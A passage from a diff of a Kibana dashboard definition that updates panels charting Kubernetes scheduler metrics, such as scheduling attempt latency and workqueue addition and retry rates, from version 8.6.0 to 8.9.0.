"d23c570b-1f9a-4ea6-be40-b6860fff0d75X1", + 1 + ], + "location": { + "max": 151, + "min": 69 + }, + "name": "pick_max", + "text": "pick_max(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.count),1)", + "type": "function" } + ], + "name": "divide", + "type": "function" }, - "textBased": { - "layers": {} - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layerId": "af585c84-2ebf-42a3-9073-4d76e8b2610d", - "layerType": "data", - "metricAccessor": "19819472-270b-4678-8367-9d09f29ae509" + 1000 + ], + "location": { + "max": 156, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.scheduler.scheduling.attempts.duration.us.sum)/pick_max(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.count),1)/1000", + "type": "function" } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + }, + "references": [ + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0", + "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "c038d00b-5e03-420e-9c45-a8aea3c41f99", + "key": "kubernetes.scheduler.scheduling.attempts.duration.us.bucket.+Inf", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.scheduling.attempts.duration.us.bucket.+Inf" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 6, - "i": "e6506b77-2e3b-4bfa-831a-8a5daada553b", - "w": 8, - "x": 21, - "y": 6 + "layers": [ + { + "accessors": [ + "d23c570b-1f9a-4ea6-be40-b6860fff0d75" + ], + "layerId": "c0fe3677-6a5b-4340-8ad0-d8e31b042fe8", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "51038211-b99f-4527-b1f1-cab52e7a4902", + "xAccessor": "3ef7d43e-6806-4ae6-bd67-38a7c29d0f7c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "e6506b77-2e3b-4bfa-831a-8a5daada553b", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c0fe3677-6a5b-4340-8ad0-d8e31b042fe8", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average scheduling attempt latency" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "d35d8849-89ba-42b8-8120-c14b087f9690", + "w": 24, + "x": 24, + "y": 12 + }, + "panelIndex": "d35d8849-89ba-42b8-8120-c14b087f9690", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2b43c72b-5964-4c48-8239-72a42fbe334f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2b43c72b-5964-4c48-8239-72a42fbe334f": { + "columnOrder": [ + "9a10de81-8e85-4356-8381-5cd24bd4f88e", + "afa79db7-0c03-40d0-a80b-6bf59b9a4925", + "46b12a48-f8b8-42ca-bfd6-adec41da55ed", + "46b12a48-f8b8-42ca-bfd6-adec41da55edX0", + "46b12a48-f8b8-42ca-bfd6-adec41da55edX1" + ], + "columns": { + "46b12a48-f8b8-42ca-bfd6-adec41da55ed": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Attempts", + "operationType": "formula", + "params": { + "formula": "counter_rate(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.sum))", + "isFormulaBroken": false + }, + "references": [ + "46b12a48-f8b8-42ca-bfd6-adec41da55edX1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "46b12a48-f8b8-42ca-bfd6-adec41da55edX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.scheduling.attempts.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of Attempts", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.scheduling.attempts.duration.us.sum" + }, + "46b12a48-f8b8-42ca-bfd6-adec41da55edX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Attempts", + "operationType": "counter_rate", + "references": [ + "46b12a48-f8b8-42ca-bfd6-adec41da55edX0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "9a10de81-8e85-4356-8381-5cd24bd4f88e": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of kubernetes.scheduler.result + 1 other", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "c038d00b-5e03-420e-9c45-a8aea3c41f99", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "c0fe3677-6a5b-4340-8ad0-d8e31b042fe8": { - "columnOrder": [ - "51038211-b99f-4527-b1f1-cab52e7a4902", - "3ef7d43e-6806-4ae6-bd67-38a7c29d0f7c", - "d23c570b-1f9a-4ea6-be40-b6860fff0d75", - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0", - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X2", - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1" - ], - "columns": { - "3ef7d43e-6806-4ae6-bd67-38a7c29d0f7c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "51038211-b99f-4527-b1f1-cab52e7a4902": { - "dataType": "string", - "isBucketed": true, - "label": "Top 3 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "d23c570b-1f9a-4ea6-be40-b6860fff0d75": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Average latency", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "ms" - } - }, - "formula": "last_value(kubernetes.scheduler.scheduling.attempts.duration.us.sum)/pick_max(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.count),1)/1000", - "isFormulaBroken": false - }, - "references": [ - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X2" - ], - "scale": "ratio" - }, - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.scheduling.attempts.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of Average latency", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.scheduling.attempts.duration.us.sum" - }, - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.scheduling.attempts.duration.us.count: *" - }, - "isBucketed": false, - "label": "Part of Average latency", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.scheduling.attempts.duration.us.count" - }, - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Average latency", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0", - { - "args": [ - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1", - 1 - ], - "location": { - "max": 151, - "min": 69 - }, - "name": "pick_max", - "text": "pick_max(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.count),1)", - "type": "function" - } - ], - "name": "divide", - "type": "function" - }, - 1000 - ], - "location": { - "max": 156, - "min": 0 - }, - "name": "divide", - "text": "last_value(kubernetes.scheduler.scheduling.attempts.duration.us.sum)/pick_max(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.count),1)/1000", - "type": "function" - } - }, - "references": [ - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X0", - "d23c570b-1f9a-4ea6-be40-b6860fff0d75X1" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "c038d00b-5e03-420e-9c45-a8aea3c41f99", - "key": "kubernetes.scheduler.scheduling.attempts.duration.us.bucket.+Inf", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.scheduling.attempts.duration.us.bucket.+Inf" - } - } - } + "secondaryFields": [ + "host.name" ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "d23c570b-1f9a-4ea6-be40-b6860fff0d75" - ], - "layerId": "c0fe3677-6a5b-4340-8ad0-d8e31b042fe8", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "51038211-b99f-4527-b1f1-cab52e7a4902", - "xAccessor": "3ef7d43e-6806-4ae6-bd67-38a7c29d0f7c" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "size": 3 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.result" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "afa79db7-0c03-40d0-a80b-6bf59b9a4925": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "30s" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "181a3fe5-e5b5-472e-98af-ea4aaadc3109", - "w": 24, - "x": 0, - "y": 12 + "layers": [ + { + "accessors": [ + "46b12a48-f8b8-42ca-bfd6-adec41da55ed" + ], + "layerId": "2b43c72b-5964-4c48-8239-72a42fbe334f", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "9a10de81-8e85-4356-8381-5cd24bd4f88e", + "xAccessor": "afa79db7-0c03-40d0-a80b-6bf59b9a4925" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "181a3fe5-e5b5-472e-98af-ea4aaadc3109", - "title": "Average scheduling attempt latency", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-2b43c72b-5964-4c48-8239-72a42fbe334f", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "2b43c72b-5964-4c48-8239-72a42fbe334f": { - "columnOrder": [ - "9a10de81-8e85-4356-8381-5cd24bd4f88e", - "afa79db7-0c03-40d0-a80b-6bf59b9a4925", - "46b12a48-f8b8-42ca-bfd6-adec41da55ed", - "46b12a48-f8b8-42ca-bfd6-adec41da55edX0", - "46b12a48-f8b8-42ca-bfd6-adec41da55edX1" - ], - "columns": { - "46b12a48-f8b8-42ca-bfd6-adec41da55ed": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Attempts", - "operationType": "formula", - "params": { - "formula": "counter_rate(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.sum))", - "isFormulaBroken": false - }, - "references": [ - "46b12a48-f8b8-42ca-bfd6-adec41da55edX1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "46b12a48-f8b8-42ca-bfd6-adec41da55edX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.scheduling.attempts.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of Attempts", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.scheduling.attempts.duration.us.sum" - }, - "46b12a48-f8b8-42ca-bfd6-adec41da55edX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Attempts", - "operationType": "counter_rate", - "references": [ - "46b12a48-f8b8-42ca-bfd6-adec41da55edX0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "9a10de81-8e85-4356-8381-5cd24bd4f88e": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of kubernetes.scheduler.result + 1 other", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 3 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.result" - }, - "afa79db7-0c03-40d0-a80b-6bf59b9a4925": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "30s" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Attempts counter rate by result" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", + "w": 48, + "x": 0, + "y": 26 + }, + "panelIndex": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(205,245,246,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Workqueue", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "2ba53067-d43d-42eb-ac50-2d941977ce95", + "w": 24, + "x": 0, + "y": 29 + }, + "panelIndex": "2ba53067-d43d-42eb-ac50-2d941977ce95", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6572ee4d-01b4-47db-8804-d8ef217e21da", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7": { + "columnOrder": [ + "f2d3349e-531e-453c-bac7-fc4c1a47ea86", + "4266ba8e-3786-4162-9140-15f600580db0", + "5b2495ee-2297-4e20-81d3-ac385205cb01", + "5b2495ee-2297-4e20-81d3-ac385205cb01X1", + "5b2495ee-2297-4e20-81d3-ac385205cb01X0" + ], + "columns": { + "4266ba8e-3786-4162-9140-15f600580db0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "5b2495ee-2297-4e20-81d3-ac385205cb01": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Counter rate", + "operationType": "formula", + "params": { + "formula": "counter_rate(last_value(kubernetes.scheduler.workqueue.adds.count))", + "isFormulaBroken": false + }, + "references": [ + "5b2495ee-2297-4e20-81d3-ac385205cb01X1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "5b2495ee-2297-4e20-81d3-ac385205cb01X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.workqueue.adds.count: *" + }, + "isBucketed": false, + "label": "", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.adds.count" + }, + "5b2495ee-2297-4e20-81d3-ac385205cb01X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "", + "operationType": "counter_rate", + "references": [ + "5b2495ee-2297-4e20-81d3-ac385205cb01X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "f2d3349e-531e-453c-bac7-fc4c1a47ea86": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Workqueues", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "46b12a48-f8b8-42ca-bfd6-adec41da55ed" - ], - "layerId": "2b43c72b-5964-4c48-8239-72a42fbe334f", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "9a10de81-8e85-4356-8381-5cd24bd4f88e", - "xAccessor": "afa79db7-0c03-40d0-a80b-6bf59b9a4925" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "size": 5 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "6572ee4d-01b4-47db-8804-d8ef217e21da", + "key": "kubernetes.scheduler.workqueue.adds.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.workqueue.adds.count" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "d35d8849-89ba-42b8-8120-c14b087f9690", - "w": 24, - "x": 24, - "y": 12 + "curveType": "LINEAR", + "layers": [ + { + "accessors": [ + "5b2495ee-2297-4e20-81d3-ac385205cb01" + ], + "layerId": "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "f2d3349e-531e-453c-bac7-fc4c1a47ea86", + "xAccessor": "4266ba8e-3786-4162-9140-15f600580db0" + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true }, - "panelIndex": "d35d8849-89ba-42b8-8120-c14b087f9690", - "title": "Attempts counter rate by result", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Workqueue additions increase rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", + "w": 24, + "x": 24, + "y": 29 + }, + "panelIndex": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "55eaa53f-a391-4996-9721-2f7af9aa963d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "77b347b2-91fa-470f-861d-ada0e175cbc4": { + "columnOrder": [ + "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", + "34f7328b-5fef-43e7-9350-98256b031a79", + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71", + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1", + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" + ], + "columns": { + "34f7328b-5fef-43e7-9350-98256b031a79": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(205,245,246,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Workqueue", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } + "68f1dece-b63b-4a27-9c1f-8068f2f9bedb": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of kubernetes.scheduler.name + 1 other", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Maximum of kubernetes.scheduler.workqueue.retries.count", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.retries.count" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "host.name" ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.name" + }, + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Rate", + "operationType": "formula", + "params": { + "formula": "counter_rate(last_value(kubernetes.scheduler.workqueue.retries.count))", + "isFormulaBroken": false + }, + "references": [ + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "metrics", - "uiState": {} + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.workqueue.retries.count: *" + }, + "isBucketed": false, + "label": "Part of Rate", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.retries.count" + }, + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Rate", + "operationType": "counter_rate", + "references": [ + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" + ], + "scale": "ratio", + "timeScale": "s" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "55eaa53f-a391-4996-9721-2f7af9aa963d", + "key": "kubernetes.scheduler.workqueue.retries.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.workqueue.retries.count" } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", - "w": 48, - "x": 0, - "y": 26 + "layers": [ + { + "accessors": [ + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71" + ], + "layerId": "77b347b2-91fa-470f-861d-ada0e175cbc4", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", + "xAccessor": "34f7328b-5fef-43e7-9350-98256b031a79" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": true }, - "panelIndex": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Workqueue retries increase rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "3a26dffa-0696-485d-b991-1dbc5092082e", + "w": 24, + "x": 0, + "y": 43 + }, + "panelIndex": "3a26dffa-0696-485d-b991-1dbc5092082e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "09d7cafe-19c4-4da8-a1b9-5ecd3ec6b0b0", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2b80230c-9cc8-444f-b092-1fbc4d764992": { + "columnOrder": [ + "e7259e4c-0700-48a5-aeff-993fc075bcab", + "7b8d9b03-439b-4171-8b64-91b8664b4b94", + 